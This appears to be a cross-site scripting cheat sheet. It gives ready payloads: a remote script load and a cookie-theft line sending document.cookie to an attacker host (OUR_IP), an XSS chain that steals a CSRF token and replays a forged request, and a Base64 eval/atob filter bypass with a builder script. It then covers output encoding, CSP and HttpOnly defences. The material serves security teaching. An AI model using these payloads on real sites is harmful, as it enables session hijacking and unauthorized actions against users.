Cross Site Scripting
Snippets of XSS stuff
XSS
Basic XSS Payload
<script>alert(window.origin)</script>
Load remote script
<script src="http://OUR_IP/script.js"></script>
Send cookie details to the attacker server (only cookies set without the HttpOnly flag are visible to document.cookie)
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
XSS + CSRF
Chaining XSS with a CSRF-protected form: the injected script reads the anti-CSRF token out of the page and submits the state-changing request with it, so the token offers no protection once JavaScript runs in the origin
<script>
// Step 1: fetch the page that carries the hidden CSRF token (same origin, so the victim's cookies are sent)
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/app/change-visibility',true);
req.send();
// Step 2: extract the token from the hidden input and replay the POST with it
function handleResponse(d) {
var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/app/change-visibility', true);
changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
changeReq.send('csrf='+token+'&action=change');
};
</script>
To avoid filters, Base64 encode the JavaScript body of the payload above (everything between the <script> tags, not the tags themselves, since eval() expects JavaScript and "<script>" is a syntax error) and send it as
<script>eval(atob('<base64 encoded payload>'));</script>
atob() is the browser's built-in Base64 decoder.
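The wrapper above, as an added example that is not part of the original page: it builds the eval(atob(...)) tag from a payload body and checks the common mistake of encoding the <script> tags along with the JavaScript. The payload body and OUR_IP are placeholders taken from the page; the helper names are this example's own.

```javascript
// Added example (not from the original page): Base64-wrapping an XSS payload body.
// PAYLOAD_BODY is a constructed placeholder; OUR_IP stands for the attacker host as on the page.

// JavaScript body of the payload: this is what gets Base64-encoded, without the <script> tags.
const PAYLOAD_BODY =
  "new Image().src='http://OUR_IP/index.php?c='+document.cookie;";

// Base64 helpers. In the browser the payload is decoded by atob(); Buffer is used here so the
// example also runs under Node. The payload is plain ASCII, so latin1 matches atob() exactly.
function toBase64(js) {
  return Buffer.from(js, 'latin1').toString('base64');
}

function fromBase64(b64) {
  return Buffer.from(b64, 'base64').toString('latin1');
}

// Build the final injected tag: the browser decodes with atob() and eval() runs the result.
function wrapPayload(jsBody) {
  return "<script>eval(atob('" + toBase64(jsBody) + "'));</script>";
}

// Check whether a string is syntactically valid JavaScript without executing it.
// new Function() only parses the source; it throws SyntaxError for a leading "<script>".
function isValidJavaScript(src) {
  try {
    new Function(src);
    return true;
  } catch (e) {
    return false;
  }
}

// Round-trip: pull the Base64 back out of the wrapped tag and decode it, as the browser would.
function roundTrip(jsBody) {
  const wrapped = wrapPayload(jsBody);
  const b64 = wrapped.match(/atob\('([A-Za-z0-9+/=]+)'\)/)[1];
  return fromBase64(b64);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(wrapPayload(PAYLOAD_BODY));
  console.log('body parses as JS:', isValidJavaScript(PAYLOAD_BODY));
  console.log('with tags parses as JS:', isValidJavaScript('<script>' + PAYLOAD_BODY + '</script>'));
}
```

The parse check is the practical takeaway: if the encoded string contains the tags, eval() throws before the payload does anything and the injection looks like a false negative.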
Mitigation
Validate inputs on the front end and the back end. Front-end checks only improve usability; the attacker controls the browser, so only server-side checks count as security controls.
Sanitize inputs on the back end where HTML must be accepted; otherwise reject or encode it.
Output HTML encoding: encode untrusted data as HTML entities (&lt; &gt; &amp; &quot; &#x27;) at the point it is written into the page, choosing the encoding for the context it lands in (HTML body, attribute value, JavaScript, URL). This is the control that stops the payloads above regardless of what input filtering missed.
Server configuration
XSS prevention headers: X-XSS-Protection drove the old browser XSS auditor, which current browsers have removed, so it should not be relied on.
Use Content-Security-Policy with directives like script-src 'self' (single quotes inside the header value) to only allow scripts hosted on the application's own origin. Without 'unsafe-inline' and 'unsafe-eval' in the policy, inline scripts and eval() are blocked as well, which defeats every payload listed above.
Use the HttpOnly cookie flag to prevent JavaScript from reading cookie values through document.cookie, and the Secure flag so the cookie is only sent over HTTPS (Secure does not hide the cookie from scripts).
WAF to detect and block known XSS payloads, as defence in depth only: it is bypassable and does not replace output encoding.
Same-Origin Policy stops a cross-site page from reading the application's responses, but does not help against XSS, because the injected script runs inside the application's own origin.
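Output encoding from the mitigation list, as an added example that is not part of the original page: a small HTML-entity encoder, a vulnerable string-concatenation template beside its hardened form, and the cookie-stealing payload from above rendered through both. The comment and display-name values are constructed attacker inputs; the function names are this example's own.

```javascript
// Added example (not from the original page): context-aware HTML entity encoding.
// ATTACK_COMMENT reuses the page's cookie-exfiltration payload; ATTACK_NAME is a constructed
// attribute breakout. Both are sample inputs, not data captured from any system.

// The five characters that can break out of an HTML text node or a quoted attribute value.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Encode for an HTML text node (between tags).
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Encode for a double-quoted attribute value. The same five entities suffice here because the
// template always quotes the attribute; this is NOT enough for unquoted attributes, event
// handlers, URLs or JavaScript contexts, which need their own encoders.
function escapeHtmlAttribute(untrusted) {
  return escapeHtml(untrusted);
}

// Vulnerable rendering: untrusted data concatenated straight into markup.
function renderCommentUnsafe(displayName, comment) {
  return '<div class="comment" title="' + displayName + '">' + comment + '</div>';
}

// Hardened rendering: every untrusted value is encoded for the context it is written into.
function renderCommentSafe(displayName, comment) {
  return '<div class="comment" title="' + escapeHtmlAttribute(displayName) + '">'
    + escapeHtml(comment) + '</div>';
}

// Crude detector used only to show the difference: a script tag or an attribute breakout
// (a closing quote followed by an event handler) that the template itself did not emit.
function containsScriptInjection(html) {
  return /<script\b/i.test(html) || /"\s*onmouseover=/i.test(html);
}

// Constructed attacker inputs.
const ATTACK_COMMENT =
  "<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>";
const ATTACK_NAME = '" onmouseover="alert(window.origin)';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderCommentUnsafe(ATTACK_NAME, ATTACK_COMMENT));
  console.log('safe:  ', renderCommentSafe(ATTACK_NAME, ATTACK_COMMENT));
}
```

In the safe output the browser shows the payload as literal text inside the div and the title attribute stays a single quoted string; in the unsafe output the attribute closes early and a script element is created, which is the same bug whether or not any input validation ran earlier.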